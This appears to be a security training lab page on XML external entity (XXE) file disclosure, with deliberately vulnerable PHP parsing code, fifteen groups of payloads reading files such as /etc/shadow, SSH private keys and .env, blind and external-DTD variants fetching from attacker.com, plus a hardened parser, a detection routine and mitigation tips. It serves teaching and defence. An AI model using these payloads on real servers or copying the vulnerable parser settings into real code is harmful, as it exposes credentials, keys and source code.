Lab 2: XXE with File Disclosure

XXE leading to file disclosure

Difficulty: Medium

Lab Overview

This lab demonstrates XXE vulnerabilities that lead to file disclosure. Attackers can use external entities to read sensitive files from the server, including configuration files, password files, and application source code.

Objective: Use XXE to read sensitive files from the server and demonstrate file disclosure vulnerabilities.

Vulnerable Code

// Vulnerable: Direct XML processing without validation
function process_xxe_file_disclosure($xml_input) {
    // Vulnerable: re-enable external entity loading (the default before libxml 2.9)
    libxml_disable_entity_loader(false);

    try {
        // Vulnerable: LIBXML_NOENT substitutes entities (including external ones),
        // LIBXML_DTDLOAD fetches external DTD subsets
        $dom = new DOMDocument();
        $dom->loadXML($xml_input, LIBXML_NOENT | LIBXML_DTDLOAD);

        // Collect child element name => text content; any expanded entity,
        // file contents included, ends up in this array and is echoed back
        $data = [];
        foreach ($dom->documentElement->childNodes as $node) {
            if ($node->nodeType === XML_ELEMENT_NODE) {
                $data[$node->nodeName] = $node->textContent;
            }
        }
        return $data;
    } catch (Exception $e) {
        // Note: loadXML() reports parse failures as warnings, not exceptions,
        // so this branch rarely fires
        return "Error parsing XML: " . $e->getMessage();
    }
}
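A hardened counterpart to the function above, added here as an example rather than taken from the lab: it drops LIBXML_NOENT and LIBXML_DTDLOAD, adds LIBXML_NONET, and rejects any DOCTYPE outright, while returning the same name => text array the lab displays. The name process_xml_safely() and the two sample documents are constructed for this example; libxml_disable_entity_loader() is left out because it is deprecated since PHP 8.0 and unnecessary with libxml 2.9 or later.

```php
<?php
// Hardened counterpart to process_xxe_file_disclosure() (added example, not lab code).
function process_xml_safely(string $xml_input): array
{
    // No LIBXML_NOENT (no entity substitution), no LIBXML_DTDLOAD (no external
    // DTD fetch); LIBXML_NONET forbids any network access during parsing.
    $options = LIBXML_NONET | LIBXML_NOERROR | LIBXML_NOWARNING;

    // loadXML() reports malformed input through libxml errors, not exceptions,
    // so capture them rather than letting warnings leak into the response.
    $previous = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    $dom->resolveExternals = false;   // never resolve external subsets
    $dom->substituteEntities = false; // leave entity references unexpanded
    $ok = $dom->loadXML($xml_input, $options);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if ($ok === false) {
        throw new InvalidArgumentException('Malformed XML');
    }

    // Defence in depth: this API's schema has no DOCTYPE, so reject any that
    // arrives; that blocks internal, parameter and external-DTD entities alike.
    foreach ($dom->childNodes as $child) {
        if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
            throw new InvalidArgumentException('DOCTYPE declarations are not allowed');
        }
    }

    // Same output shape as the lab: child element name => text content.
    $data = [];
    foreach ($dom->documentElement->childNodes as $node) {
        if ($node->nodeType === XML_ELEMENT_NODE) {
            $data[$node->nodeName] = $node->textContent;
        }
    }
    return $data;
}

// Constructed inputs: a benign document and the lab's basic file-disclosure payload.
$benign  = '<?xml version="1.0"?><root><data>hello</data></root>';
$hostile = '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
         . '<root><data>&xxe;</data></root>';
print_r(process_xml_safely($benign));
try {
    process_xml_safely($hostile);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

The benign document yields the array the lab's page renders; the hostile one is refused before any entity is touched, whether or not the underlying libxml would have expanded it.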
XXE File Disclosure Tester

File Disclosure Warning

This lab demonstrates file disclosure via XXE. The following can be exploited:

  • file:///etc/passwd - User accounts
  • file:///etc/shadow - Password hashes
  • file:///etc/hosts - Host mappings
  • file:///proc/self/environ - Environment variables

Vulnerability Details

  • Type: XXE with File Disclosure
  • Severity: High
  • Method: POST
  • Issue: File disclosure via XXE

File Disclosure Types

  • System Files: /etc/passwd, /etc/shadow
  • Configuration Files: Apache, Nginx configs
  • Application Files: Source code, configs
  • Environment Data: Environment variables

XXE File Disclosure Payloads

Use these payloads to test file disclosure via XML External Entity Injection:

1. Basic File Disclosure Structure:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root>

2. Linux System Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/hosts"> ]> <root><data>&xxe;</data></root>

3. Windows System Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///C:/Windows/system.ini"> ]> <root><data>&xxe;</data></root>

4. Configuration Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/apache2/apache2.conf"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/nginx/nginx.conf"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/mysql/my.cnf"> ]> <root><data>&xxe;</data></root>

5. Application Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/www/html/index.php"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/www/html/config.php"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/www/html/.env"> ]> <root><data>&xxe;</data></root>

6. Environment and Process Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///proc/self/environ"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///proc/version"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///proc/cpuinfo"> ]> <root><data>&xxe;</data></root>

7. Log Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/log/apache2/access.log"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/log/apache2/error.log"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/log/auth.log"> ]> <root><data>&xxe;</data></root>

8. SSH and Key Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///home/user/.ssh/id_rsa"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///home/user/.ssh/authorized_keys"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///home/user/.ssh/known_hosts"> ]> <root><data>&xxe;</data></root>

9. Database Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/lib/mysql/mysql/user.MYD"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/lib/mysql/mysql/db.MYD"> ]> <root><data>&xxe;</data></root>

10. PHP Wrapper for Base64 Encoding:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/shadow"> ]> <root><data>&xxe;</data></root>

11. PHP Wrapper for Different Encodings:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]> <root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/read=string.rot13/resource=index.php"> ]> <root><data>&xxe;</data></root>

12. Multiple Entity Declarations:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY file1 SYSTEM "file:///etc/passwd"> <!ENTITY file2 SYSTEM "file:///etc/hosts"> <!ENTITY file3 SYSTEM "file:///proc/version"> ]> <root> <passwd>&file1;</passwd> <hosts>&file2;</hosts> <version>&file3;</version> </root>

13. Parameter Entity Declarations:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY xxe SYSTEM "data://text/plain;base64,%file;"> ]> <root><data>&xxe;</data></root>

14. External DTD for File Disclosure:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root SYSTEM "http://attacker.com/evil.dtd"> <root><data>&xxe;</data></root>
evil.dtd content:
<!ENTITY xxe SYSTEM "file:///etc/passwd">

15. Blind XXE for File Disclosure:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> <root><data>&xxe;</data></root>
evil.dtd content:
<!ENTITY xxe SYSTEM "file:///etc/passwd">

Mitigation Strategies
  • Disable external entity processing in XML parsers
  • Use whitelist-based validation for allowed XML schemas
  • Implement proper input validation and sanitization
  • Use secure XML parsing libraries
  • Regular security testing and vulnerability assessments
  • Monitor for unusual XML processing patterns
  • Implement proper file system permissions
  • Use Web Application Firewall (WAF) to detect XXE attempts
  • Implement proper access controls for sensitive files
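The last two bullets call for monitoring and WAF detection; the following added example (not part of the lab) shows one way to triage an XML request body for the indicators common to this lab's payloads and turn the result into a log line. xxe_indicators() and the sample documents are constructed for the example, and the DTD host in the blind sample is a placeholder.

```php
<?php
// Added example (not part of the lab): flag XML request bodies that carry the
// XXE indicators shared by this lab's payloads, for a WAF rule or application
// log. Monitoring aid only; the fix is a parser that rejects DOCTYPEs.
function xxe_indicators(string $body): array
{
    $reasons = [];
    // Any DOCTYPE is suspicious for an API whose schema never declares one.
    if (preg_match('/<!DOCTYPE\b/i', $body)) {
        $reasons[] = 'doctype';
    }
    // <!DOCTYPE root SYSTEM "http://..."> pulls the whole DTD from elsewhere.
    if (preg_match('/<!DOCTYPE\s+[\w:.-]+\s+(SYSTEM|PUBLIC)\b/i', $body)) {
        $reasons[] = 'external-dtd';
    }
    // Parameter entities (<!ENTITY % name ...>) underpin the blind variants.
    if (preg_match('/<!ENTITY\s+%/i', $body)) {
        $reasons[] = 'parameter-entity';
    }
    // Record each URI scheme a SYSTEM entity points at; file:, php: and data:
    // are the ones this lab's disclosure payloads use, http: means a remote fetch.
    if (preg_match_all('/SYSTEM\s+["\']([a-z][a-z0-9+.-]*):/i', $body, $m)) {
        foreach (array_unique(array_map('strtolower', $m[1])) as $scheme) {
            $reasons[] = 'system-uri:' . $scheme;
        }
    }
    return $reasons;
}

// Constructed samples: one benign document and three payload shapes from the lab.
// The DTD host is a placeholder.
$samples = [
    'benign'     => '<?xml version="1.0"?><root><data>hello</data></root>',
    'basic'      => '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                  . '<root><data>&xxe;</data></root>',
    'php-filter' => '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM '
                  . '"php://filter/read=convert.base64-encode/resource=/etc/passwd">]><root><data>&xxe;</data></root>',
    'blind'      => '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % file SYSTEM "file:///etc/passwd">'
                  . '<!ENTITY % remote SYSTEM "http://dtd-host.example/evil.dtd">%remote;]><root><data>&xxe;</data></root>',
];

foreach ($samples as $name => $xml) {
    $reasons = xxe_indicators($xml);
    // One log line per request; an empty reason list means the body passed.
    printf("%-10s %s\n", $name, $reasons ? 'SUSPICIOUS ' . implode(',', $reasons) : 'ok');
}
```

Pattern matching on the raw body is a cheap first filter for alerting on unexpected DOCTYPEs and file:, php: or data: schemes; it is deliberately not the control that prevents disclosure, which belongs in the parser configuration.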